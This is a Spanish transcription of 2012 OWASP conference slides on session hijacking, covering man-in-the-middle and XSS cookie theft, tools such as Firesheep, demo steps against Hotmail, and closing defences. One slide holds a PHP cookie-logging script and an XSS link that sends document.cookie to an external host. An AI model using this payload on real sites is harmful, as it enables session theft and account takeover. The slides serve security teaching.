Session Hijacking: Secuestro de sesiones en aplicaciones web empresariales



Documentos relacionados
Session Hijacking. Session Hijacking: Secuestro y robo de sesiones de aplicaciones web Parte II. Omar Palomino

Session Hijacking. Session Hijacking: Secuestro y robo de sesiones de aplicaciones web. Omar Palomino.

Ataques XSS en Aplicaciones Web

Anonimato en la web. Anonimato en la web: Proyecto TOR + SQLMap. Omar Palomino. omarc320@gmail.com.

Sesión 13. Seguridad en la web. Luisa Fernanda Rincón Pérez

Cross Site Scripting. Conceptos Básicos y Casos prácticos. Antonio González Castro antonio@noveria.es

Pentesting con OWASP Zed Attack Proxy

Hacking Ético Web. I Jornadas Tecnológicas CEEPS Carlos García García i52gagac@uco.es

DOCS. Pautas básicas para el DESARROLLO DE PLUGINS

MINT A NIVEL BROSERW CON BEEF

Seguridad de un Portal


LOS 7 PECADOS DEL DESARROLO WEB & TENTACIÓN DEL USUARIOS EN APLICACIONES MOVILES.

Detectar y solucionar infecciones en un sitio web

Cómo cambiar o restablecer exprs de usuario Contraseña (How to Reset your exprs User Account Password)

En el artículo del mes pasado,

Seguridad en Sitios Web de Alto Tráfico. Ing. Enrique Hurtarte Juárez

Índice. 1. Introducción al XSS. 2. Taller Práctico Explotando la Vulnerabilidad. 3. Robo de cookies Uso de estas. 4. Arreglando la vulnerabilidad.

Desarrollo seguro en Drupal. Ezequiel Vázquez De la calle

Su Seguridad es Nuestro Éxito

DIPLOMADO EN SEGURIDAD INFORMATICA

Información sobre seguridad

Capítulo 2.- Vulnerabilidades en aplicaciones web.

Sophos Computer Security Scan Guía de inicio

Optimización de Inyecciones SQL

Puedo estar tranquilo acerca de la información de mi empresa? Donde puedo poner mis archivos cuando viajo?

Ilustre Colegio Oficial de Médicos de Zamora. Correo Corporativo. Manual de Usuario

Ingeniero Técnico en Informática - UCA Máster en Ingeniería del Software - US Máster en Seguridad de las TIC - US

Resumen ejecutivo inventario de activos de información. Procesos Dir. Corporativa Recursos Tecnologicos

Explotación a CMSs Web

Segurinfo NOA Seguridad en el desarrollo de aplicaciones Web

Roberto Garcia Amoriz. Iniciándose en XSS. c_b_n_a. Leganés 6-7 Febrero 2014

Conseguir información sobre los hábitos de navegación del usuario, entre otras.

Recomendaciones de Seguridad Red Social Twitter

Empresas. Guía de uso. App Mi Movistar Empresas

Servicio de Notificaciones Electrónicas y Dirección Electrónica Habilitada

Webinar Gratuito OWASP WebScarab

TEMA 3. REDES Y SEGURIDAD INFORMÁTICA

Principales riesgos de seguridad en aplicaciones móviles OWASP Mobile Top 10

Información sobre seguridad

Seguridad Informática

Manual de uso básico de la aplicación

Internet cuando se visitan ciertas páginas. Una cookie no contiene ni recopila información

Guía de doble autenticación

Seguridad Ofensiva en WordPress

Control de versiones con Subversion

Capítulo 4 Pruebas e implementación de la aplicación CAPÍTULO 4 PRUEBAS E IMPLEMENTACIÓN DE LA APLICACIÓN

Ministerio de Educación,Cultura y Deporte. Aulas en Red. Windows. Módulo 2: Servicios Básicos. Directorio Activo

Herramientas Tecnológicas de Productividad. Sesión 8. Hojas de cálculo

Seguridad Informática: Introducción (II)

SECURITY DAY PERU. Ataques a las Aplicaciones Web. Explotación de Aplicaciones Web. Technologies SOLUTIONS FOR KEEPING YOUR BUSINESS UP

VULNERABILIDAD DE FIJACIÓN DE SESIONES EN APLICACIONES WEB BY SH4V

Gastón Toth Lic. en Computación CEH Pentester

Manual de iniciación a

MANUAL DE USUARIO DE CUENTAS DE CORREO

POLÍTICAS DE SEGURIDAD PARA EL DESARROLLO DE SISTEMAS DE CAPUFE

CAPITULO IV CONCLUSIONES Y RECOMENDACIONES

Año 2012 ENHACKE ENHACKE CERTIFICATE IN WEBAPP PENTESTING. Curso Oficial de Certificación ENHACKE CURSOS

Security Research XSS CROSS SITE SCRIPTING Chebyte chebyte at gmail.com

LA FORMA MÁS SEGURA DE CONECTARTE A TU EMPRESA

GUÍA PARA LA INSTALACIÓN DE MOODLE EN UN COMPUTADOR PERSONAL QUE USA EL SISTEMA OPERATIVO MS. WINDOWS

Manual de uso básico de la aplicación

LA INTRANET -Manual general-

Formato para prácticas de laboratorio

Electrónica: Configuración en Mozilla Firefox

Guía Rápida de Inicio

Web: Ataque y Defensa. my kung fu is stronger than yours, The lone Gunmen

Manual de Integración CubeCart

MANUAL CENTRO DE SOPORTE PARA USUARIOS

INTRODUCCION. Tema: Protocolo de la Capa de aplicación. FTP HTTP. Autor: Julio Cesar Morejon Rios

Guía de Instalación. Glpi

Infraestructura Tecnológica. Sesión 10: Sistemas cortafuego

Loewe Preguntas frecuentes Página 1. Loewe Support Portal. Preguntas frecuentes.

RETO HACKER DE VERANO

rede corporativa manual del usuario remoto para Windows

Transport Layer Security (TLS) Acerca de TLS

Para este caso vamos a suponer que son los siguientes:

In-seguridad y malware en dispositivos móviles

[VPN] Manual Instalación VPN. [Usuario Windows]

Resumen. DESlock+ Guía Básica de Configuración. Requerimientos del Sistema:

Seguridad en Servicios de Hosting

Política de cookies. la utilización de cookies en las webs y aplicaciones de PERSONLIG-GUIDE-

Guía de Seguridad en Redes Inalámbricas

2. Licencias Creative Commons

Propuesta realizada por miembros del Comité Técnico de Tutorías del Centro Universitario de Ciencias de la Salud

S E G U R I D A D E N A P L I C A C I O N E S W E B

LOGO COLABORADOR

Manual de uso de Moodle para alumnos

ARE YOUR WEB VULNERABLE?

Manual de uso de la plataforma para monitores. CENTRO DE APOYO TECNOLÓGICO A EMPRENDEDORES -bilib

Microsoft Dynamics. Instalación de Management Reporter for Microsoft Dynamics ERP

Webroot SecureAnywhere. Preguntas Frecuentes

Inseguridad de los sistemas de autenticación en aplicaciones web

LOS VIRUS IMFORMÁTICOS

Programación páginas web. Servidor (PHP)

Formato para prácticas de laboratorio

Política de comunicación corporativa

Servicios de Seguridad de la Información

Técnicas de Programación

Transcripción:

Session Hijacking: en aplicaciones web empresariales OWASP LATAM TOUR 2012 OMAR PALOMINO HUAMANÍ KUNAK CONSULTING SAC omarc320@gmail.com opalomino@kunak.com.pe Telef: 973861650 http://www.el-palomo.com The OWASP Foundation http://www.owasp.org

AGRADECIMIENTOS A : OWASP LATAM TOUR 2012 2

Derechos de Autor y Licencia Copyright 2003 2012 Fundación OWASP Este documento es publicado bajo la licencia Creative Commons Attribution ShareAlike 3.0. Para cualquier reutilización o distribución, usted debe dejar en claro a otros los términos de la licencia sobre este trabajo. The OWASP Foundation http://www.owasp.org

OWASP LATAM TOUR 2012 Ing. Sistemas y Maestrista de Ing. de Computación y Sistemas, CEH, Security+, ITIL v3. Consultor en seguridad de información de KUNAK Consulting. Psicólogo que aun no comienza sus estudios. Escritor en mis tiempos libres: http://www.el-palomo.com http://www.facebook.com/el.palomo.seguridad.informacion

INDICE 1. Introducción Qué es el session hijacking? Objetivo de la presentación Ejercicio 1: Demostración de la facilidad del robo de 2. Soy vulnerable? Técnicas y métodos de explotación Escenarios de ataque: Ejercicio 2: Hombre en el medio (MiTM) Ejercicio 3: Cross Site Scripting (XSS) 3. Robo de en aplicaciones web comerciales: Hotmail, Facebook y Wordpress 4. Técnicas y método para evitar el secuestro/robo de 5. Conclusiones OWASP LATAM TOUR 2012 5

RESUMEN Cómo funciona el de Qué es session hijacking? Es el secuestro/robo de (identificación) de usuarios para lograr acceso privilegiado a una aplicación web comprometiendo la integridad y confidencialidad de la información. OWASP LATAM TOUR 2012 6

RESUMEN Cómo funciona el de IMPORTANCIA La inadecuada gestión de en aplicaciones web empresariales se ha convertido en la tercera vulnerabilidad en aplicaciones web (OWASP Top 10 2010) El impacto de explotar esta vulnerabilidad es CRÍTICO debido a la exposición de información restringida para el negocio. OWASP LATAM TOUR 2012 7

Cómo funciona el de Funcionamiento: Man in the middle 1 El usuario ha ingresado normalmente a una aplicación web comercial o corporativo, como: Hotmail Facebook Aplicaciones web particulares (corporativos) 2 Importante: El usuario (la víctima) no se entera que su sesión de aplicación web ha sido vulnerada. El atacante encuentra un mecanismo para averiguar el identificador de SESIÓN y realizar el secuestro de la sesión del usuario. OWASP LATAM TOUR 2012 8

Cómo funciona el de Funcionamiento: Cross Site Scripting 2 1. Un usuario normal ingresa a la App. Web y ejecuta el código Javascript. 2. El código Javascript envía el código de Sesión al servidor web externo. 1 Importante: Un usuario perspicaz puede darse cuenta de la inserción de código malicioso en la página web. OWASP LATAM TOUR 2012 1. El usuario malicioso prepara un servidor web externo para almacenar las. 2. El usuarios malicioso coloca código JavaScript sobre la App. Web Vulnerable. 9

OWASP LATAM TOUR 2012 Cómo funciona el de Funcionamiento: Cross Site Scripting 1 <?php $session = $_GET["cookie"]; $date = date("l ds of F Y h:i:s A"); $user_agent = $_SERVER['HTTP_USER_AGENT']; $file = fopen('log.txt','a'); fwrite($file, "DATE: $date USER AGENT: $user_agent COOKIE: $session \n"); fclose($file); header("location: http://xxxxxxx/hijacking/listado.php");?> Importante: Un usuario perspicaz puede darse cuenta de la inserción de código malicioso en la página web. <a href="#" onclick=document.location="htt p://192.168.1.48/steal.php?cook ie="+escape(document.cookie);> Ver aqui los detalles</a> 10

Cómo funciona el de Por qué sucede esto? 1 Cuando el usuario ingresa a una página web: 1. Se crea una sesión aleatoria en el servidor web, esta sesión se almacena en una cookie o en una sesión. 2. Esta cookie viaja por la web cada vez que el cliente navega por la aplicación. La cookie contiene un identificador de sesión. Esto sucede porque: La transmisión de la sesión viaja en texto plano (MITM) Cross Site Scripting (XSS) Algoritmo débil de ID de sesión ( predecibles o muy pequeñas). Incorrecta configuración del bloqueo de. Sesiones que nunca expiran. OWASP LATAM TOUR 2012 2 1. El atacante realiza un ataque para conseguir la sesión del usuario: Hombre en el medio (Man in the middle MiTM) Predecir el identificador de sesión (Predict Session) Cross site scripting (XSS) Otros de menos probabilidad 2. El atacante modifica la cookie e ingresa a la aplicación web con el contenido restringido de la víctima.

OWASP LATAM TOUR 2012 Cómo funciona el de Vamos a la práctica Aplicación web PHP : 1. Capturamos la sesión mediante la técnica de hombre en el medio. 2. Identificamos la cookie y el número de sesión. 3. Modificamos la cookie mediante una herramienta: Advanced Cookie Manager. 4. Accedemos a la aplicación sin usuario ni contraseña. Aplicaciones web en internet (HOTMAIL): 1. Capturamos la sesión mediante la técnica de hombre en el medio. 2. Identificamos la cookie: RPSTAuth 3. Modificamos la cookie mediante una herramienta: Advanced Cookie Manager. 4. Accedemos a la aplicación sin usuario ni contraseña.

EJEMPLOS

OWASP LATAM TOUR 2012 Cómo funciona el de Debemos automatizar el ataque. Hamster y Ferret Ferret: Herramienta para formatear el archivo PCAP producto del sniffing. Hamster: Proxy que muestra las cookies formateadas por Ferret. que funcionan en Windows y Linux. Firesheep Plugin de Mozilla Firefox Automatiza de manera muy rápida el robo de. A la fecha (2012) el plugin está descontinuado. Greasemonkey Plugin de Mozilla Firefox Permite ingresar la cookie capturada mediante MITM

OWASP LATAM TOUR 2012 Cómo funciona el de Debemos automatizar el ataque. Greasemonkey / Wireshark Cookie Dump Plugin de Mozilla Firefox Permite ingresar la cookie capturada mediante MITM

OWASP LATAM TOUR 2012 Cómo funciona el de Firesheep Plugin de Mozilla Firefox Automatiza de manera muy rápida el robo de. A la fecha (2012) el plugin está descontinuado. 1. El atacante realiza un ataque para conseguir la sesión del usuario (MITM). 2. Firesheep coge el identificador de sesión y te permite ingresar a la aplicación de la manera más fácil y sencilla.

EJEMPLOS

Summary & Conclusion

Cómo funciona el de UTILIZAR CONEXIONES SSL PARA TODA LA PÁGINA WEB Y NO SÓLO PARA EL LOGIN DE APLICACIONES WEB. REALIZAR UN CORRECTO FILTRADO DE VARIABLES EN APLICACIONES WEB PARA EVITAR ATAQUES XSS. EVITAR UTILIZAR REDES PÚBLICAS, ASEGURASE HACERLO A TRAVÉS DE UNA CONEXIÓN VPN. CONFIGURAR TODOS LOS SERVICIOS POSIBLES A TRAVÉS DE HTTPS: Hotmail, Facebook, Twitter, etc. OWASP LATAM TOUR 2012 19

Preguntas OWASP LATAM TOUR 2012 The OWASP Foundation http://www.owasp.org 20

Session Hijacking: en aplicaciones web empresariales OWASP LATAM TOUR 2012 OMAR PALOMINO HUAMANÍ KUNAK CONSULTING SAC omarc320@gmail.com opalomino@kunak.com.pe Telef: 973861650 http://www.el-palomo.com The OWASP Foundation http://www.owasp.org